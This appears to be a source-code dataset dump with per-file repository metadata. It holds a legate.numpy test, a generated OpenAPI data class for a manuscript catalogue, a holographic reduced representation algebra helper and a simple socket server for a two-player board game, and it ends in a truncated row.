hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8b8fdfbcf9706a09172ee59fba63e07828a65599
| 2,492
|
py
|
Python
|
tests/array_creation.py
|
manopapad/legate.numpy
|
896f4fd9b32db445da6cdabf7b78d523fca96936
|
[
"Apache-2.0"
] | null | null | null |
tests/array_creation.py
|
manopapad/legate.numpy
|
896f4fd9b32db445da6cdabf7b78d523fca96936
|
[
"Apache-2.0"
] | null | null | null |
tests/array_creation.py
|
manopapad/legate.numpy
|
896f4fd9b32db445da6cdabf7b78d523fca96936
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import legate.numpy as lg
def test():
x = lg.array([1, 2, 3])
y = np.array([1, 2, 3])
z = lg.array(y)
assert np.array_equal(x, z)
assert x.dtype == z.dtype
xe = lg.empty((2, 3))
ye = np.empty((2, 3))
assert lg.shape(xe) == np.shape(ye)
assert xe.dtype == ye.dtype
xz = lg.zeros((2, 3))
yz = np.zeros((2, 3))
assert np.array_equal(xz, yz)
assert xz.dtype == yz.dtype
xo = lg.ones((2, 3))
yo = np.ones((2, 3))
assert np.array_equal(xo, yo)
assert xo.dtype == yo.dtype
xf = lg.full((2, 3), 3)
yf = np.full((2, 3), 3)
assert np.array_equal(xf, yf)
assert xf.dtype == yf.dtype
xel = lg.empty_like(x)
yel = np.empty_like(y)
assert lg.shape(xel) == np.shape(yel)
assert xel.dtype == yel.dtype
xzl = lg.zeros_like(x)
yzl = np.zeros_like(y)
assert np.array_equal(xzl, yzl)
assert xzl.dtype == yzl.dtype
xol = lg.ones_like(x)
yol = np.ones_like(y)
assert np.array_equal(xol, yol)
assert xol.dtype == yol.dtype
xfl = lg.full_like(x, 3)
yfl = np.full_like(y, 3)
assert np.array_equal(xfl, yfl)
assert xfl.dtype == yfl.dtype
x = lg.arange(10)
y = np.arange(10)
assert np.array_equal(x, y)
assert x.dtype == y.dtype
x = lg.arange(10, dtype=np.int32)
y = np.arange(10, dtype=np.int32)
assert np.array_equal(x, y)
assert x.dtype == y.dtype
x = lg.arange(2.0, 10.0)
y = np.arange(2.0, 10.0)
assert np.array_equal(x, y)
assert x.dtype == y.dtype
x = lg.arange(2, 30, 3)
y = np.arange(2, 30, 3)
assert np.array_equal(x, y)
assert x.dtype == y.dtype
# xfls = lg.full_like(x, '3', dtype=np.str_)
# yfls = np.full_like(y, '3', dtype=np.str_)
# assert(lg.array_equal(xfls, yfls))
# assert(xfls.dtype == yfls.dtype)
return
if __name__ == "__main__":
test()
| 25.428571
| 74
| 0.620385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 738
| 0.296148
|
8b90aeb5aec1b01857b6aa8b3d9934d4cfdd1543
| 29,250
|
py
|
Python
|
libs/python/qumranica/models/catalogue_match_dto.py
|
Scripta-Qumranica-Electronica/SQE_API_Connectors
|
aaa9b9eb8709d4257c32ea57321a179c6b1e041a
|
[
"MIT"
] | null | null | null |
libs/python/qumranica/models/catalogue_match_dto.py
|
Scripta-Qumranica-Electronica/SQE_API_Connectors
|
aaa9b9eb8709d4257c32ea57321a179c6b1e041a
|
[
"MIT"
] | null | null | null |
libs/python/qumranica/models/catalogue_match_dto.py
|
Scripta-Qumranica-Electronica/SQE_API_Connectors
|
aaa9b9eb8709d4257c32ea57321a179c6b1e041a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
SQE API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from qumranica.configuration import Configuration
class CatalogueMatchDTO(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'image_catalog_id': 'int',
'institution': 'str',
'catalogue_number1': 'str',
'catalogue_number2': 'str',
'proxy': 'str',
'url': 'str',
'filename': 'str',
'suffix': 'str',
'thumbnail': 'str',
'license': 'str',
'iaa_edition_catalogue_id': 'int',
'manuscript_name': 'str',
'name': 'str',
'match_author': 'str',
'match_confirmation_author': 'str',
'match_id': 'int',
'date_of_match': 'datetime',
'date_of_confirmation': 'datetime',
'catalog_side': 'SideDesignation',
'imaged_object_id': 'str',
'manuscript_id': 'int',
'edition_name': 'str',
'edition_volume': 'str',
'edition_location1': 'str',
'edition_location2': 'str',
'edition_side': 'SideDesignation',
'comment': 'str',
'text_fragment_id': 'int',
'edition_id': 'int',
'confirmed': 'bool'
}
attribute_map = {
'image_catalog_id': 'imageCatalogId',
'institution': 'institution',
'catalogue_number1': 'catalogueNumber1',
'catalogue_number2': 'catalogueNumber2',
'proxy': 'proxy',
'url': 'url',
'filename': 'filename',
'suffix': 'suffix',
'thumbnail': 'thumbnail',
'license': 'license',
'iaa_edition_catalogue_id': 'iaaEditionCatalogueId',
'manuscript_name': 'manuscriptName',
'name': 'name',
'match_author': 'matchAuthor',
'match_confirmation_author': 'matchConfirmationAuthor',
'match_id': 'matchId',
'date_of_match': 'dateOfMatch',
'date_of_confirmation': 'dateOfConfirmation',
'catalog_side': 'catalogSide',
'imaged_object_id': 'imagedObjectId',
'manuscript_id': 'manuscriptId',
'edition_name': 'editionName',
'edition_volume': 'editionVolume',
'edition_location1': 'editionLocation1',
'edition_location2': 'editionLocation2',
'edition_side': 'editionSide',
'comment': 'comment',
'text_fragment_id': 'textFragmentId',
'edition_id': 'editionId',
'confirmed': 'confirmed'
}
def __init__(self, image_catalog_id=None, institution=None, catalogue_number1=None, catalogue_number2=None, proxy=None, url=None, filename=None, suffix=None, thumbnail=None, license=None, iaa_edition_catalogue_id=None, manuscript_name=None, name=None, match_author=None, match_confirmation_author=None, match_id=None, date_of_match=None, date_of_confirmation=None, catalog_side=None, imaged_object_id=None, manuscript_id=None, edition_name=None, edition_volume=None, edition_location1=None, edition_location2=None, edition_side=None, comment=None, text_fragment_id=None, edition_id=None, confirmed=None, local_vars_configuration=None): # noqa: E501
"""CatalogueMatchDTO - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._image_catalog_id = None
self._institution = None
self._catalogue_number1 = None
self._catalogue_number2 = None
self._proxy = None
self._url = None
self._filename = None
self._suffix = None
self._thumbnail = None
self._license = None
self._iaa_edition_catalogue_id = None
self._manuscript_name = None
self._name = None
self._match_author = None
self._match_confirmation_author = None
self._match_id = None
self._date_of_match = None
self._date_of_confirmation = None
self._catalog_side = None
self._imaged_object_id = None
self._manuscript_id = None
self._edition_name = None
self._edition_volume = None
self._edition_location1 = None
self._edition_location2 = None
self._edition_side = None
self._comment = None
self._text_fragment_id = None
self._edition_id = None
self._confirmed = None
self.discriminator = None
self.image_catalog_id = image_catalog_id
self.institution = institution
self.catalogue_number1 = catalogue_number1
self.catalogue_number2 = catalogue_number2
self.proxy = proxy
self.url = url
self.filename = filename
self.suffix = suffix
self.thumbnail = thumbnail
self.license = license
self.iaa_edition_catalogue_id = iaa_edition_catalogue_id
self.manuscript_name = manuscript_name
self.name = name
self.match_author = match_author
self.match_confirmation_author = match_confirmation_author
self.match_id = match_id
self.date_of_match = date_of_match
self.date_of_confirmation = date_of_confirmation
if catalog_side is not None:
self.catalog_side = catalog_side
self.imaged_object_id = imaged_object_id
self.manuscript_id = manuscript_id
self.edition_name = edition_name
self.edition_volume = edition_volume
self.edition_location1 = edition_location1
self.edition_location2 = edition_location2
self.edition_side = edition_side
self.comment = comment
self.text_fragment_id = text_fragment_id
self.edition_id = edition_id
self.confirmed = confirmed
@property
def image_catalog_id(self):
"""Gets the image_catalog_id of this CatalogueMatchDTO. # noqa: E501
:return: The image_catalog_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._image_catalog_id
@image_catalog_id.setter
def image_catalog_id(self, image_catalog_id):
"""Sets the image_catalog_id of this CatalogueMatchDTO.
:param image_catalog_id: The image_catalog_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and image_catalog_id is None: # noqa: E501
raise ValueError("Invalid value for `image_catalog_id`, must not be `None`") # noqa: E501
self._image_catalog_id = image_catalog_id
@property
def institution(self):
"""Gets the institution of this CatalogueMatchDTO. # noqa: E501
:return: The institution of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._institution
@institution.setter
def institution(self, institution):
"""Sets the institution of this CatalogueMatchDTO.
:param institution: The institution of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and institution is None: # noqa: E501
raise ValueError("Invalid value for `institution`, must not be `None`") # noqa: E501
self._institution = institution
@property
def catalogue_number1(self):
"""Gets the catalogue_number1 of this CatalogueMatchDTO. # noqa: E501
:return: The catalogue_number1 of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._catalogue_number1
@catalogue_number1.setter
def catalogue_number1(self, catalogue_number1):
"""Sets the catalogue_number1 of this CatalogueMatchDTO.
:param catalogue_number1: The catalogue_number1 of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and catalogue_number1 is None: # noqa: E501
raise ValueError("Invalid value for `catalogue_number1`, must not be `None`") # noqa: E501
self._catalogue_number1 = catalogue_number1
@property
def catalogue_number2(self):
"""Gets the catalogue_number2 of this CatalogueMatchDTO. # noqa: E501
:return: The catalogue_number2 of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._catalogue_number2
@catalogue_number2.setter
def catalogue_number2(self, catalogue_number2):
"""Sets the catalogue_number2 of this CatalogueMatchDTO.
:param catalogue_number2: The catalogue_number2 of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
self._catalogue_number2 = catalogue_number2
@property
def proxy(self):
"""Gets the proxy of this CatalogueMatchDTO. # noqa: E501
:return: The proxy of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._proxy
@proxy.setter
def proxy(self, proxy):
"""Sets the proxy of this CatalogueMatchDTO.
:param proxy: The proxy of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
self._proxy = proxy
@property
def url(self):
"""Gets the url of this CatalogueMatchDTO. # noqa: E501
:return: The url of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this CatalogueMatchDTO.
:param url: The url of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and url is None: # noqa: E501
raise ValueError("Invalid value for `url`, must not be `None`") # noqa: E501
self._url = url
@property
def filename(self):
"""Gets the filename of this CatalogueMatchDTO. # noqa: E501
:return: The filename of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._filename
@filename.setter
def filename(self, filename):
"""Sets the filename of this CatalogueMatchDTO.
:param filename: The filename of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and filename is None: # noqa: E501
raise ValueError("Invalid value for `filename`, must not be `None`") # noqa: E501
self._filename = filename
@property
def suffix(self):
"""Gets the suffix of this CatalogueMatchDTO. # noqa: E501
:return: The suffix of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._suffix
@suffix.setter
def suffix(self, suffix):
"""Sets the suffix of this CatalogueMatchDTO.
:param suffix: The suffix of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and suffix is None: # noqa: E501
raise ValueError("Invalid value for `suffix`, must not be `None`") # noqa: E501
self._suffix = suffix
@property
def thumbnail(self):
"""Gets the thumbnail of this CatalogueMatchDTO. # noqa: E501
:return: The thumbnail of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._thumbnail
@thumbnail.setter
def thumbnail(self, thumbnail):
"""Sets the thumbnail of this CatalogueMatchDTO.
:param thumbnail: The thumbnail of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and thumbnail is None: # noqa: E501
raise ValueError("Invalid value for `thumbnail`, must not be `None`") # noqa: E501
self._thumbnail = thumbnail
@property
def license(self):
"""Gets the license of this CatalogueMatchDTO. # noqa: E501
:return: The license of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._license
@license.setter
def license(self, license):
"""Sets the license of this CatalogueMatchDTO.
:param license: The license of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and license is None: # noqa: E501
raise ValueError("Invalid value for `license`, must not be `None`") # noqa: E501
self._license = license
@property
def iaa_edition_catalogue_id(self):
"""Gets the iaa_edition_catalogue_id of this CatalogueMatchDTO. # noqa: E501
:return: The iaa_edition_catalogue_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._iaa_edition_catalogue_id
@iaa_edition_catalogue_id.setter
def iaa_edition_catalogue_id(self, iaa_edition_catalogue_id):
"""Sets the iaa_edition_catalogue_id of this CatalogueMatchDTO.
:param iaa_edition_catalogue_id: The iaa_edition_catalogue_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and iaa_edition_catalogue_id is None: # noqa: E501
raise ValueError("Invalid value for `iaa_edition_catalogue_id`, must not be `None`") # noqa: E501
self._iaa_edition_catalogue_id = iaa_edition_catalogue_id
@property
def manuscript_name(self):
"""Gets the manuscript_name of this CatalogueMatchDTO. # noqa: E501
:return: The manuscript_name of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._manuscript_name
@manuscript_name.setter
def manuscript_name(self, manuscript_name):
"""Sets the manuscript_name of this CatalogueMatchDTO.
:param manuscript_name: The manuscript_name of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and manuscript_name is None: # noqa: E501
raise ValueError("Invalid value for `manuscript_name`, must not be `None`") # noqa: E501
self._manuscript_name = manuscript_name
@property
def name(self):
"""Gets the name of this CatalogueMatchDTO. # noqa: E501
:return: The name of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this CatalogueMatchDTO.
:param name: The name of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def match_author(self):
"""Gets the match_author of this CatalogueMatchDTO. # noqa: E501
:return: The match_author of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._match_author
@match_author.setter
def match_author(self, match_author):
"""Sets the match_author of this CatalogueMatchDTO.
:param match_author: The match_author of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and match_author is None: # noqa: E501
raise ValueError("Invalid value for `match_author`, must not be `None`") # noqa: E501
self._match_author = match_author
@property
def match_confirmation_author(self):
"""Gets the match_confirmation_author of this CatalogueMatchDTO. # noqa: E501
:return: The match_confirmation_author of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._match_confirmation_author
@match_confirmation_author.setter
def match_confirmation_author(self, match_confirmation_author):
"""Sets the match_confirmation_author of this CatalogueMatchDTO.
:param match_confirmation_author: The match_confirmation_author of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
self._match_confirmation_author = match_confirmation_author
@property
def match_id(self):
"""Gets the match_id of this CatalogueMatchDTO. # noqa: E501
:return: The match_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._match_id
@match_id.setter
def match_id(self, match_id):
"""Sets the match_id of this CatalogueMatchDTO.
:param match_id: The match_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and match_id is None: # noqa: E501
raise ValueError("Invalid value for `match_id`, must not be `None`") # noqa: E501
self._match_id = match_id
@property
def date_of_match(self):
"""Gets the date_of_match of this CatalogueMatchDTO. # noqa: E501
:return: The date_of_match of this CatalogueMatchDTO. # noqa: E501
:rtype: datetime
"""
return self._date_of_match
@date_of_match.setter
def date_of_match(self, date_of_match):
"""Sets the date_of_match of this CatalogueMatchDTO.
:param date_of_match: The date_of_match of this CatalogueMatchDTO. # noqa: E501
:type: datetime
"""
if self.local_vars_configuration.client_side_validation and date_of_match is None: # noqa: E501
raise ValueError("Invalid value for `date_of_match`, must not be `None`") # noqa: E501
self._date_of_match = date_of_match
@property
def date_of_confirmation(self):
"""Gets the date_of_confirmation of this CatalogueMatchDTO. # noqa: E501
:return: The date_of_confirmation of this CatalogueMatchDTO. # noqa: E501
:rtype: datetime
"""
return self._date_of_confirmation
@date_of_confirmation.setter
def date_of_confirmation(self, date_of_confirmation):
"""Sets the date_of_confirmation of this CatalogueMatchDTO.
:param date_of_confirmation: The date_of_confirmation of this CatalogueMatchDTO. # noqa: E501
:type: datetime
"""
self._date_of_confirmation = date_of_confirmation
@property
def catalog_side(self):
"""Gets the catalog_side of this CatalogueMatchDTO. # noqa: E501
:return: The catalog_side of this CatalogueMatchDTO. # noqa: E501
:rtype: SideDesignation
"""
return self._catalog_side
@catalog_side.setter
def catalog_side(self, catalog_side):
"""Sets the catalog_side of this CatalogueMatchDTO.
:param catalog_side: The catalog_side of this CatalogueMatchDTO. # noqa: E501
:type: SideDesignation
"""
self._catalog_side = catalog_side
@property
def imaged_object_id(self):
"""Gets the imaged_object_id of this CatalogueMatchDTO. # noqa: E501
:return: The imaged_object_id of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._imaged_object_id
@imaged_object_id.setter
def imaged_object_id(self, imaged_object_id):
"""Sets the imaged_object_id of this CatalogueMatchDTO.
:param imaged_object_id: The imaged_object_id of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and imaged_object_id is None: # noqa: E501
raise ValueError("Invalid value for `imaged_object_id`, must not be `None`") # noqa: E501
self._imaged_object_id = imaged_object_id
@property
def manuscript_id(self):
"""Gets the manuscript_id of this CatalogueMatchDTO. # noqa: E501
:return: The manuscript_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._manuscript_id
@manuscript_id.setter
def manuscript_id(self, manuscript_id):
"""Sets the manuscript_id of this CatalogueMatchDTO.
:param manuscript_id: The manuscript_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and manuscript_id is None: # noqa: E501
raise ValueError("Invalid value for `manuscript_id`, must not be `None`") # noqa: E501
self._manuscript_id = manuscript_id
@property
def edition_name(self):
"""Gets the edition_name of this CatalogueMatchDTO. # noqa: E501
:return: The edition_name of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._edition_name
@edition_name.setter
def edition_name(self, edition_name):
"""Sets the edition_name of this CatalogueMatchDTO.
:param edition_name: The edition_name of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and edition_name is None: # noqa: E501
raise ValueError("Invalid value for `edition_name`, must not be `None`") # noqa: E501
self._edition_name = edition_name
@property
def edition_volume(self):
"""Gets the edition_volume of this CatalogueMatchDTO. # noqa: E501
:return: The edition_volume of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._edition_volume
@edition_volume.setter
def edition_volume(self, edition_volume):
"""Sets the edition_volume of this CatalogueMatchDTO.
:param edition_volume: The edition_volume of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and edition_volume is None: # noqa: E501
raise ValueError("Invalid value for `edition_volume`, must not be `None`") # noqa: E501
self._edition_volume = edition_volume
@property
def edition_location1(self):
"""Gets the edition_location1 of this CatalogueMatchDTO. # noqa: E501
:return: The edition_location1 of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._edition_location1
@edition_location1.setter
def edition_location1(self, edition_location1):
"""Sets the edition_location1 of this CatalogueMatchDTO.
:param edition_location1: The edition_location1 of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and edition_location1 is None: # noqa: E501
raise ValueError("Invalid value for `edition_location1`, must not be `None`") # noqa: E501
self._edition_location1 = edition_location1
@property
def edition_location2(self):
"""Gets the edition_location2 of this CatalogueMatchDTO. # noqa: E501
:return: The edition_location2 of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._edition_location2
@edition_location2.setter
def edition_location2(self, edition_location2):
"""Sets the edition_location2 of this CatalogueMatchDTO.
:param edition_location2: The edition_location2 of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and edition_location2 is None: # noqa: E501
raise ValueError("Invalid value for `edition_location2`, must not be `None`") # noqa: E501
self._edition_location2 = edition_location2
@property
def edition_side(self):
"""Gets the edition_side of this CatalogueMatchDTO. # noqa: E501
:return: The edition_side of this CatalogueMatchDTO. # noqa: E501
:rtype: SideDesignation
"""
return self._edition_side
@edition_side.setter
def edition_side(self, edition_side):
"""Sets the edition_side of this CatalogueMatchDTO.
:param edition_side: The edition_side of this CatalogueMatchDTO. # noqa: E501
:type: SideDesignation
"""
if self.local_vars_configuration.client_side_validation and edition_side is None: # noqa: E501
raise ValueError("Invalid value for `edition_side`, must not be `None`") # noqa: E501
self._edition_side = edition_side
@property
def comment(self):
"""Gets the comment of this CatalogueMatchDTO. # noqa: E501
:return: The comment of this CatalogueMatchDTO. # noqa: E501
:rtype: str
"""
return self._comment
@comment.setter
def comment(self, comment):
"""Sets the comment of this CatalogueMatchDTO.
:param comment: The comment of this CatalogueMatchDTO. # noqa: E501
:type: str
"""
self._comment = comment
@property
def text_fragment_id(self):
"""Gets the text_fragment_id of this CatalogueMatchDTO. # noqa: E501
:return: The text_fragment_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._text_fragment_id
@text_fragment_id.setter
def text_fragment_id(self, text_fragment_id):
"""Sets the text_fragment_id of this CatalogueMatchDTO.
:param text_fragment_id: The text_fragment_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and text_fragment_id is None: # noqa: E501
raise ValueError("Invalid value for `text_fragment_id`, must not be `None`") # noqa: E501
self._text_fragment_id = text_fragment_id
@property
def edition_id(self):
"""Gets the edition_id of this CatalogueMatchDTO. # noqa: E501
:return: The edition_id of this CatalogueMatchDTO. # noqa: E501
:rtype: int
"""
return self._edition_id
@edition_id.setter
def edition_id(self, edition_id):
"""Sets the edition_id of this CatalogueMatchDTO.
:param edition_id: The edition_id of this CatalogueMatchDTO. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and edition_id is None: # noqa: E501
raise ValueError("Invalid value for `edition_id`, must not be `None`") # noqa: E501
self._edition_id = edition_id
@property
def confirmed(self):
"""Gets the confirmed of this CatalogueMatchDTO. # noqa: E501
:return: The confirmed of this CatalogueMatchDTO. # noqa: E501
:rtype: bool
"""
return self._confirmed
@confirmed.setter
def confirmed(self, confirmed):
"""Sets the confirmed of this CatalogueMatchDTO.
:param confirmed: The confirmed of this CatalogueMatchDTO. # noqa: E501
:type: bool
"""
self._confirmed = confirmed
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CatalogueMatchDTO):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, CatalogueMatchDTO):
return True
return self.to_dict() != other.to_dict()
| 32.79148
| 653
| 0.645675
| 28,887
| 0.98759
| 0
| 0
| 21,097
| 0.721265
| 0
| 0
| 14,751
| 0.504308
|
8b914a0a6371ff8952db67b7eee682b5c44c059b
| 569
|
py
|
Python
|
nengo_ssp/hrr_algebra.py
|
nsdumont/nengo_ssp
|
9530a4618e213fb695b52887772c1309d0f07a0b
|
[
"MIT"
] | null | null | null |
nengo_ssp/hrr_algebra.py
|
nsdumont/nengo_ssp
|
9530a4618e213fb695b52887772c1309d0f07a0b
|
[
"MIT"
] | null | null | null |
nengo_ssp/hrr_algebra.py
|
nsdumont/nengo_ssp
|
9530a4618e213fb695b52887772c1309d0f07a0b
|
[
"MIT"
] | null | null | null |
import numpy as np
from nengo_spa.algebras.hrr_algebra import HrrAlgebra
from nengo.utils.numpy import is_number
class HrrAlgebra(HrrAlgebra):
def fractional_bind(self, A, b):
"""Fractional circular convolution."""
if not is_number(b):
raise ValueError("b must be a scalar.")
return np.fft.ifft(np.fft.fft(A, axis=0)**b, axis=0)
def bind(self, a, b):
n = len(a)
if len(b) != n:
raise ValueError("Inputs must have same length.")
return np.fft.ifft(np.fft.fft(a) * np.fft.fft(b), n=n)
| 35.5625
| 62
| 0.620387
| 455
| 0.799649
| 0
| 0
| 0
| 0
| 0
| 0
| 90
| 0.158172
|
8b9247a613a137d9a893fcd8004929a037e3fffd
| 2,234
|
py
|
Python
|
server.py
|
Xinzhe-Qi/15112-Term-Project
|
07a4b78d23629478039667ed4c29287e5e781bf3
|
[
"MIT"
] | null | null | null |
server.py
|
Xinzhe-Qi/15112-Term-Project
|
07a4b78d23629478039667ed4c29287e5e781bf3
|
[
"MIT"
] | null | null | null |
server.py
|
Xinzhe-Qi/15112-Term-Project
|
07a4b78d23629478039667ed4c29287e5e781bf3
|
[
"MIT"
] | null | null | null |
import socket
from _thread import *
import pickle
from board import Board
import time
hostname = socket.gethostname()
ipAddr = socket.gethostbyname(hostname)
print(ipAddr)
server = ipAddr
port = 5556
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((server, port))
except socket.error as e:
print(str(e))
s.listen(2)
print("Waiting for a connection, Server Started")
bo = Board()
currentId = "b"
connections = 0
def threaded_client(conn):
global currentId, bo, connections
variable = bo
bo.start_user = currentId
if connections > 2:
bo.start_user = "s"
data1 = pickle.dumps(variable)
if currentId == "w":
bo.ready = True
bo.startTime = time.time()
conn.send(data1)
currentId = bo.start_user = "w"
connections += 1
while True:
try:
data2 = conn.recv(4096*4).decode("utf-8")
if not data2:
break
else:
if data2.count("move") > 0:
info = data2.split(" ")
x = int(info[1])
y = int(info[2])
pos = (x, y)
color = info[3]
bo.addMove(pos, color)
elif data2 == "reset":
bo.__init__()
elif data2 == "winner b":
bo.winner = "b"
elif data2 == "winner w":
bo.winner = "w"
print("Reveived", data2)
if bo.ready:
if bo.turn == "w":
bo.time1 = 900 - (time.time() - bo.startTime) - bo.storedTime1
else:
bo.time2 = 900 - (time.time() - bo.startTime) - bo.storedTime2
sendData = pickle.dumps(bo)
print("Sending ", bo)
conn.sendall(sendData)
except Exception as e:
print(e)
break
connections -= 1
if connections < 2:
bo = Board()
currentId = "w"
print("Disconnected")
conn.close()
while True:
conn, addr = s.accept()
print("Connected to:", addr)
start_new_thread(threaded_client, (conn,))
| 21.27619
| 86
| 0.499552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 158
| 0.070725
|
8b93ff57b731c6c33351b57dd2f1b5402cee9a07
| 72
|
py
|
Python
|
examples/random_article.py
|
yusufusta/wikiHowUnofficialAPI
|
e29ae96a2dcf893f5b587804b9dd37a412cdd561
|
[
